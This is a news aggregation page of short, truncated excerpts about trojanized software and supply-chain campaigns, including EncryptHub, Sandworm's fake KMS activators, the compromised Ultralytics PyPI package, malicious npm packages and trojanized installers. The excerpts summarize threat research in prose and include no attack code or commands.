trojanized
-
Attacks commenced with the distribution of phishing emails purporting to be from Binance.
-
The financially motivated threat actor known as EncryptHub has been observed orchestrating sophisticated phishing campaigns to deploy information stealers and ransomware, while also working on a new product called EncryptRAT. “EncryptHub has been observed targeting users of popular applications, by distributing trojanized versions,” Outpost24 KrakenLabs said in a new report shared with The
-
There are probably no gamers left who don’t know that downloading games from torrent trackers is risky business. Yes, they come at no cost, cracked and sometimes conveniently repacked, but they might contain malware. That’s why security solutions throw a fit — quarantining torrent files, preventing the installation of cracks… well, we should be thankful for that!…
-
EclecticIQ analysts have identified a high-confidence cyber espionage campaign conducted by Sandworm (APT44), a threat actor supporting Russia’s Main Intelligence Directorate (GRU), against Ukrainian Windows users. The campaign, likely ongoing since late 2023, involves the use of pirated Microsoft Key Management Service (KMS) activators and fake Windows updates to deliver a new version of BACKORDER,…
-
Executive Summary Introduction to Malware Binary Triage (IMBT) Course Looking to level up your skills? Get 10% off using coupon code: MWNEWS10 for any flavor. Enroll Now and Save 10%: Coupon Code MWNEWS10 Note: Affiliate link – your enrollment helps support this platform at no extra cost to you. EclecticIQ analysts assess with high confidence…
-
Both campaigns involved the distribution of malicious emails purporting to be invoices, purchase orders, or quotation requests with attachments, which when opened triggers a PowerShell script fetching the trojanized image and executing a .NET-based loader to launch the payloads.
-
Attackers have compromised Ultralytics YOLO packages published on PyPI, the official Python package index, by compromising the build environment of the popular library for creating custom machine learning models. The malicious code deployed cryptocurrency mining malware on systems that installed the package, but the attackers could have delivered any type of malware.
-
In a new report, Dr.Web’s research team has uncovered a dangerous wave of malicious apps on Google Play, revealing that over 2 million users have unwittingly downloaded trojanized applications, primarily from the Android.FakeApp family. One of the standout examples, Android.FakeApp.1669, “differs from most of the threats that are similar to it in that it uses…
-
Ukraine is confronting a new cyberattack vector from Russian military intelligence (GRU) connected hackers that is targeting local governments. The Computer Emergency Response Team of Ukraine (CERT-UA) recently uncovered an advanced phishing campaign by the Russian GRU-linked APT28, or “Fancy Bear.” Using a novel approach, attackers lure recipients into executing malicious PowerShell commands directly from…
-
Phylum’s automated risk detection platform recently flagged several suspicious packages published to npm. Upon investigation, we found these packages attempting to exfiltrate Ethereum private keys and gain SSH access to the victim’s machine by writing the attacker’s SSH public key in the root user’s authorized_keys file. –cta– Stop me if you’ve heard this one before…
-
Mandiant has unveiled a new wave of cyber-espionage attacks orchestrated by the North Korea-linked group UNC2970. This group has recently employed a sophisticated method to deliver a custom backdoor named MISTPEN, by trojanizing a legitimate PDF reader, SumatraPDF. The report highlights that UNC2970 is primarily targeting senior-level employees in critical industries such as energy and…
-
Cybersecurity researchers have observed a sharp increase in infections associated with a malware distribution campaign that employs a loader known as NUMOZYLOD.
-
How did you hear about LinuxSecurity.com? No answer selected. Please try again. Please select either existing option or enter your own, however not both.
-
Since May 26, 2024, Phylum has been monitoring a persistent supply chain attacker involving a trojanized version of jQuery. We initially discovered the malicious variant on npm, where we saw the compromised version published in dozens of packages over a month. After investigating, we found instances of the trojanized jQuery on other platforms, such as…
-
Jul 09, 2024NewsroomSupply Chain Attack / Web Security
-
Attackers have leveraged trojanized versions of Indian software provider Conceptworld’s installers for its Copywhiz, Notezilla, and RecentX programs to facilitate the delivery of information-stealing malware, The Hacker News reports.
-
Malicious Android apps have been leveraged by Pakistan-linked hacking operation Transparent Tribe to facilitate the deployment of the CapraRAT spyware as part of a new surveillance campaign against gamers and weapons enthusiasts, reports The Hacker News.
-
Rapid7, a prominent cybersecurity firm, has uncovered a sophisticated supply chain attack targeting users of well-known Windows software tools Notezilla, RecentX, and Copywhiz. The attack involves the distribution of trojanized installers that, alongside legitimate software, install information-stealing malware capable of downloading additional malicious payloads.
-
Last updated at Thu, 27 Jun 2024 18:01:02 GMT The following Rapid7 analysts contributed to this research: Leo Gutierrez, Tyler McGraw, Sarah Lee, and Thomas Elkins.
-
Attacks using malicious installers for Microsoft Teams, Google Chrome, and other widely used software have been launched to facilitate the delivery of the Oyster backdoor, also known as Broomstick, as part of a new malvertising campaign, The Hacker News reports.